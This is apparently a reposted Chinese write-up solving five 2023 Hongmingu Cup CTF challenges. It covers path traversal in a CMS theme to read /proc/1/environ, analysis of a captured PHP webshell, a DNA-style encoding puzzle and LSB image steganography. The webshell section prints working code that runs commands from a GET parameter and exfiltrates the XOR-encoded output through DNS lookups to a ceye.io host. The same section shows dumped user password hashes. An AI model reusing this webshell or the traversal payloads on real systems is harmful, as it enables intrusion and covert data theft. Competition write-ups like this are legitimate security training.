一
Dreamer
点击左侧栏中的“栏目/文章”选项进入到栏目管理,新建顶级栏目,创建一个命名为测试的顶级栏目。
../../../../../../../../../../flag
二
Dreamer_revenge
第一种思路是跟上一个题目一样,只不过把访问的文件改成
../../.../../../../proc/1/environ。
default_v2目录复制一份,修改成default_v3。修改其中的
theme.json文件。将其中的themePath值修改成../../../../../../../../../../../../../../
default_v3成default_v3.zip,到后台风格管理处上传zip文件并启用主题。
/proc/1/environ,即可找到flag。
三
hacker
<?php $servername="127.0.0.1";
$username="root";
$password="123456";
$dbname="zentao";
$conn=new PDO("mysql:host=$servername;dbname=$dbname",$username,$password);
$conn->setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_EXCEPTION);
$stmt=$conn->prepare("SELECT password FROM zt_user WHERE account='admin'");
$stmt->execute();
$result=$stmt->fetch(PDO::FETCH_ASSOC);
$conn=null;
$param=$_GET["cmd"];
$password=$result["password"];
$output=shell_exec($param);
$hex_output=bin2hex($output);
$hex_password=bin2hex($password);
$len_output=strlen($hex_output);
$len_password=strlen($hex_password);
$max_subdomain_length=62;
$subdomain_base="yafgcy.ceye.io";
$hex_xor="";
for ($i=0;$i<$len_output;$i++) {
$char_output=$hex_output[$i];
$char_password=$hex_password[$i%$len_password];
$char_xor=dechex(hexdec($char_output)^hexdec($char_password));
if(strlen($hex_xor.$char_xor)>$max_subdomain_length) {
if(strlen($hex_xor)%2!=0) {
$subdomain="0"."$hex_xor.$subdomain_base";
} else {
$subdomain="$hex_xor.$subdomain_base";
}
gethostbyname($subdomain);
$hex_xor="";
} else {
$hex_xor.=$char_xor;
}
}
if(strlen($hex_xor)%2!=0) {
$subdomain="0"."$hex_xor.$subdomain_base";
} else {
$subdomain="$hex_xor.$subdomain_base";
}
gethostbyname($subdomain);
?>
<xmp class='a-left'>select account,password from zt_user</xmp>{"status":"success","data":"[{"account":"admin","password":"8a3e684c923b763d252cf1e8734a7a29"},{"account":"productManager","password":"e10adc3949ba59abbe56e057f20f883e"},{"account":"projectManager","password":"e10adc3949ba59abbe56e057f20f883e"},{"account":"dev1","password":"e10adc3949ba59abbe56e057f20f883e"},{"account":"dev2","password":"e10adc3949ba59abbe56e057f20f883e"},{"account":"dev3","password":"e10adc3949ba59abbe56e057f20f883e"},{"account":"tester1","password":"e10adc3949ba59abbe56e057f20f883e"},{"account":"tester2","password":"e10adc3949ba59abbe56e057f20f883e"},{"account":"tester3","password":"e10adc3949ba59abbe56e057f20f883e"},{"account":"testManager","password":"e10adc3949ba59abbe56e057f20f883e"},{"account":"test","password":"e10adc3949ba59abbe56e057f20f883e"}]","md5":"71cfaa7002d809c0860d3749abb3454c"}
if (strlen($hex_xor . $char_xor) > $max_subdomain_length) {...}这段处理有关,不过我实在看不出来这段为啥会造成数据丢失。59115a4b465044695a5a56015c4252065e501c130e416f5c5647556b510044
0 5b0e5d4b5f5b5b69505c57074f18430c423f5b0c0852105a521d4409476b 5
4a 32135c07594c474d4d4a47684453501657411c171e456f4c5f5659043d19
0c49 5011391d4e40054d495a4368
79227024716c7522787370254c777230667673222570247b76677322632671
d 7b357226771575227a7372237677702573611f372570317b767277207620 6
14 79207024777b60247e6674231a626727666171372570317f766773207620
0678 79226731756c60206d75703670754e
<?php
$hex_output = "59115a4b465044695a5a56015c4252065e501c130e416f5c5647556b510044";
$hex_password = bin2hex("8a3e684c923b763d252cf1e8734a7a29");
$len_output = strlen($hex_output);
$len_password = strlen($hex_password);
$hex_xor = "";
for ($i = 0; $i < $len_output; $i++) {
$char_data = $hex_output[$i];
$char_password = $hex_password[$i % $len_password];
$output = dechex(hexdec($char_data) ^ hexdec($char_password));
$hex_xor .= $output;
}
echo $hex_xor."n";
echo hex2bin($hex_xor);
?>
api.php
checktable.php
data
favcon.ico
index.php
ioncube.php
robots.txt
secret.txt
theme
xhp
xxx1.php
ACCAGTAAAACG{AATTCAACAACATGCTGCCTACA-AACAAAAACAAT-TCATCAACAAAAACAACTGGTGA-TTCTTCTCATGATGAAAACTTCTTCTGCTGC}
替换几位会发现flag格式是uuid形式的,按照以下这个规则替换即可。
'AAA':'a'
'AAC':'b'
'AAG':'c'
'AAT':'d'
'ACA':'e'
'ACC':'f'
'TCA':'1'
'TCC':'2'
'TCG':'3'
'TCT':'4'
'TGA':'5'
'TGC':'6'
'TGG':'7'
'TGT':'8'
'TTA':'9'
'TTC':'0'
ACC AGT AAA ACG { AAT TCA ACA ACA TGC TGC
f l a g { d 1 e e 6 6
[T]CT ACA - AAC AAA AAC AAT - TCA TCA ACA AA[A/C/G/T]
4 e - b a b d - 1 1 e a/b/c/d
AAC AAC TGG TGA - TTC TTC TCA TGA TGA AA[A/C/G/T]
b b 7 5 - 0 0 1 5 5 a/b/c/d
[A]AC TTC TTC TGC TGC}
b 0 0 6 6}
flag{d1ee664e-babd-11ed-bb75-00155db0066}
四
阿尼亚
Text Encoding Brute Force。
得到压缩包密码,使用https://sekao.net/pixeljihad/这个网站进行解密。
+-+-++--+- ++---+-++- -+--++-++- +--++-++-- --+++++--- ++-++---+- +++-+-+--- +-+-+---++ ---+++-++- -+--++-++- -+--+++-+- -+--++-++- -+--++-++- ++-+-+-+-- -+--+++-+- ++-++---+- -++++---+- -+--++-++- ++-+-+-+-- +-+++---+- +++-++---- ---+++-++- +-+-+---++ ++-+-+-+-- +-+-+--++- ++--+--++- -++++---+- +---+++-+- ++-+-+-+-- -++++---+- -+--+++-+- +--+-+-++- +++-+-+--- +-+++---+- -+--+-+++- -+--++-++- ---+++-++- ++++----+- -++++---+- -+--+++-+- -+--++-++- ----+++++-
五
X光的秘密
导出图片看看:
File->Export->To a picture file...注意选择没有注解的,不勾选
Show annotations以及勾选Without overlay。
Stegsolve看了看开头和结尾几张图片,发现最后三张图片有LSB痕迹。
0x91: 1001 0001
0x61: 0110 0001
0x16: 0001 0110
0x89: 1000 1001
18->19->20的顺序把二进制的每一位连接起来,组了前八位发现0x89,果然还是三张图片的LSB数据拆分组合形成组成新图片,只不过是二进制的每一位。接下来就好办了,Stegsolve把每张图片的LSB数据导出来。先把二进制数据取出来,注意补高。
file_list = ['flag1', 'flag2', 'flag3']
bindata_file = ['bin_data1', 'bin_data2', 'bin_data3']
for i in range(len(file_list)):
bin_data = ""
with open(file_list[i], 'rb') as f:
data = f.read()
for idx in range(len(data)):
bin_data += "{:08b}".format(data[idx])
with open(bindata_file[i], 'w') as f1:
f1.write(bin_data)
with open('bin_data1', 'r') as f:
bin_data1 = f.read()
with open('bin_data2', 'r') as f:
bin_data2 = f.read()
with open('bin_data3', 'r') as f:
bin_data3 = f.read()
all_bin_data = ""
for i in range(len(bin_data1)):
all_bin_data += bin_data1[i] + bin_data2[i] + bin_data3[i]
hex_data = ""
for i in range(0, len(all_bin_data), 8):
hex_data += "{:02x}".format(int(all_bin_data[i:i+8], 2))
with open('flag.png', 'wb') as f:
f.write(bytes.fromhex(hex_data))
参考文章:
https://forum.butian.net/index.php/share/2183
https://blog.csdn.net/mochu7777777/article/details/130255217
看雪ID:SkyShadow
https://bbs.kanxue.com/user-home-901466.htm
# 往期推荐
1、《linux x86 缓冲区溢出》level3:简单的缓冲区溢出,通过ROP绕过DEP和ASLR防护
3、PE解析思路
球分享
球点赞
球在看
原文始发于微信公众号(看雪学苑):2023红明谷杯赛题-题解
